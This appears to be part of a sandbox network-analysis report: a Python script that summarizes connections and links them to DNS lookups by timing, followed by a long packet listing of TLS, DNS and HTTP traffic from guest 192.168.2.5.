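The packet list that follows records three conversations from the sandbox guest 192.168.2.5: a TLS session on source port 49704 to 34.200.57.114:443, a DNS exchange on port 49705 with 1.1.1.1, and an HTTP connection on port 49706 to 34.147.147.173:80 whose first packet leaves about a millisecond after the last packet from 1.1.1.1 arrives, the resolve-then-connect sequence of a program contacting a server by name. The list carries only the 5-tuple and a timestamp, so neither the queried name nor the HTTP request is visible here. The script below is an added example, not part of the report: it collapses such a listing into one record per connection (packets per direction, first and last timestamp, duration) and then flags servers first contacted shortly after a DNS reply. The embedded rows are an excerpt of the listing below; treating 192.168.2.0/24 as the local side, the two-second window and the port-to-service map are the example's assumptions.

```python
from datetime import datetime, timedelta

LOCAL_PREFIX = "192.168.2."          # assumed: the sandbox guest's network in this report
SERVICE_BY_PORT = {53: "dns", 80: "http", 443: "tls"}

# Excerpt of the report's packet list (timestamp | src port | dst port | src ip | dst ip),
# embedded so the script runs offline.
SAMPLE_ROWS = """\
Dec 31, 2024 15:47:01.288567066 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:01.288611889 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:01.288670063 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:02.737359047 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:03.622034073 CET | 49705 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 15:47:03.626854897 CET | 53 | 49705 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 15:47:04.330909014 CET | 53 | 49705 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 15:47:04.331835032 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.336641073 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.337905884 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.342823029 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
"""


def parse_timestamp(text: str) -> datetime:
    """'Dec 31, 2024 15:47:01.288567066 CET' -> naive datetime; nanoseconds truncated to microseconds."""
    base, frac = text.replace(" CET", "").rsplit(".", 1)
    return datetime.strptime(base, "%b %d, %Y %H:%M:%S") + timedelta(microseconds=int(frac[:6]))


def parse_rows(table: str):
    """Yield (time, src_port, dst_port, src_ip, dst_ip) for every non-empty row."""
    for line in table.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = (field.strip() for field in line.split("|"))
        yield parse_timestamp(ts), int(sport), int(dport), sip, dip


def orient(sport, dport, sip, dip):
    """Map a packet onto its connection key (client, cport, server, sport) and a direction."""
    if sip.startswith(LOCAL_PREFIX) and not dip.startswith(LOCAL_PREFIX):
        return (sip, sport, dip, dport), "out"
    if dip.startswith(LOCAL_PREFIX) and not sip.startswith(LOCAL_PREFIX):
        return (dip, dport, sip, sport), "in"
    # neither or both sides local: treat the lower (well-known) port as the server
    return ((sip, sport, dip, dport), "out") if dport <= sport else ((dip, dport, sip, sport), "in")


def summarize_flows(table: str):
    """One record per connection, in order of first appearance in the list."""
    flows = {}
    for ts, sport, dport, sip, dip in parse_rows(table):
        key, direction = orient(sport, dport, sip, dip)
        f = flows.setdefault(key, {"client": key[0], "cport": key[1], "server": key[2], "sport": key[3],
                                    "service": SERVICE_BY_PORT.get(key[3], "tcp/%d" % key[3]),
                                    "out": 0, "in": 0, "first": ts, "last": ts, "last_in": None})
        f[direction] += 1
        f["last"] = max(f["last"], ts)
        if direction == "in":                     # last packet seen from the server side
            f["last_in"] = ts if f["last_in"] is None else max(f["last_in"], ts)
    for f in flows.values():
        f["duration_s"] = (f["last"] - f["first"]).total_seconds()
    return list(flows.values())


def connections_after_dns(flows, window_s: float = 2.0):
    """'server:port' for non-DNS connections opened within window_s after any DNS reply packet."""
    replies = [f["last_in"] for f in flows if f["service"] == "dns" and f["last_in"] is not None]
    hits = []
    for f in flows:
        if f["service"] == "dns":
            continue
        if any(0 <= (f["first"] - r).total_seconds() <= window_s for r in replies):
            hits.append("%s:%d" % (f["server"], f["sport"]))
    return hits
```

On the excerpt `summarize_flows` yields the TLS, DNS and HTTP connections in that order, with the TLS session lasting 1.448792 s, and `connections_after_dns` returns only `34.147.147.173:80`: the TLS connection predates the DNS exchange, so it is not attributed to it. Pasting the full cleaned list into `SAMPLE_ROWS` gives the per-direction packet counts for the whole capture.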
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 15:47:01.288567066 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:01.288611889 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:01.288670063 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:01.308451891 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:01.308474064 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:02.005373001 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:02.005847931 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:02.005872965 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:02.008187056 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:02.008250952 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:02.009784937 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:02.009880066 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:02.015402079 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:02.015410900 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:02.068397045 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:02.722023964 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:02.722404957 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:02.722484112 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:02.737337112 CET | 49704 | 443 | 192.168.2.5 | 34.200.57.114
Dec 31, 2024 15:47:02.737359047 CET | 443 | 49704 | 34.200.57.114 | 192.168.2.5
Dec 31, 2024 15:47:03.622034073 CET | 49705 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 15:47:03.626854897 CET | 53 | 49705 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 15:47:03.626939058 CET | 49705 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 15:47:03.627711058 CET | 49705 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 15:47:03.632488966 CET | 53 | 49705 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 15:47:04.330909014 CET | 53 | 49705 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 15:47:04.331582069 CET | 49705 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 15:47:04.331835032 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.336628914 CET | 53 | 49705 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 15:47:04.336641073 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.336704016 CET | 49705 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 15:47:04.336735964 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.337905884 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.342823029 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.342833042 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.342843056 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.342852116 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.342869997 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.342878103 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.342930079 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.342936993 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.342938900 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.342978001 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.343005896 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.346235037 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.346245050 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.346297979 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.347727060 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.347735882 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.347769976 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.347779036 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.347780943 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.347788095 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.347811937 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.347814083 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.347836971 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.347860098 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.391457081 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.391623020 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.443437099 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.443526983 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.495503902 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.495558023 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.543433905 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.543489933 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.595468998 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.595539093 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.643424988 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.643476009 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.691492081 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.691571951 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.739439964 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.739510059 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.776839972 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.777043104 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.781970024 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.781984091 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782001972 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782011986 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782032967 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782037020 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782046080 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782068014 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782093048 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782094002 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782103062 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782119989 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782129049 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782149076 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782177925 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782211065 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782221079 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782232046 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782269001 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782270908 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782285929 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782315969 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782321930 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782360077 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782366991 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782404900 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782449007 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782505035 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782540083 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782588005 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782639980 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782668114 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782728910 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782738924 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782789946 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782829046 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782847881 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782902002 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782919884 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.782943964 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.782988071 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.786798954 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.786854029 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.786911011 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.786943913 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.786962986 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.786992073 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.786993027 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787040949 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.787041903 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787163019 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787173033 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787184000 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787210941 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787262917 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787316084 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787360907 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787370920 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787424088 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787434101 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787491083 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787501097 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787512064 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787580967 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787590981 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787595987 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787621975 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787631989 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787785053 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787796021 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787839890 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787848949 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787904978 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.787919998 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787930012 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787976980 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.787982941 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.787992954 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788017988 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788027048 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788032055 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.788062096 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.788068056 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788078070 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788110018 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788119078 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788157940 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788167953 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788202047 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788213015 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788239956 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788249016 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788288116 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788297892 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788312912 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788321972 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788337946 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788346052 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788367987 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788377047 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788420916 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788429976 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788461924 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788470984 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788496971 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788505077 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788583040 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788590908 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788599014 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788608074 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788654089 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788662910 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788768053 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788778067 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788794041 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788803101 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.788813114 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.791793108 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.791809082 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.791817904 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.791826963 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.791837931 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.791871071 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.791881084 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.791891098 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.792774916 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.792787075 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.792908907 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.792920113 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.792937994 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.792947054 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.792993069 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793003082 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793029070 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.793106079 CET | 49706 | 80 | 192.168.2.5 | 34.147.147.173
Dec 31, 2024 15:47:04.793107033 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793117046 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793142080 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793152094 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793183088 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793241978 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793257952 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793282032 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793366909 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793376923 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793441057 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793451071 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793493032 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793502092 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793560982 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793582916 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793668032 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793677092 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793684959 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793704033 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793713093 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793721914 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793773890 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793783903 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793833017 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793842077 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793911934 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793920994 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793953896 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793963909 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793987036 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.793996096 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794037104 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794045925 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794063091 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794070959 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794083118 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794117928 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
Dec 31, 2024 15:47:04.794126987 CET | 80 | 49706 | 34.147.147.173 | 192.168.2.5
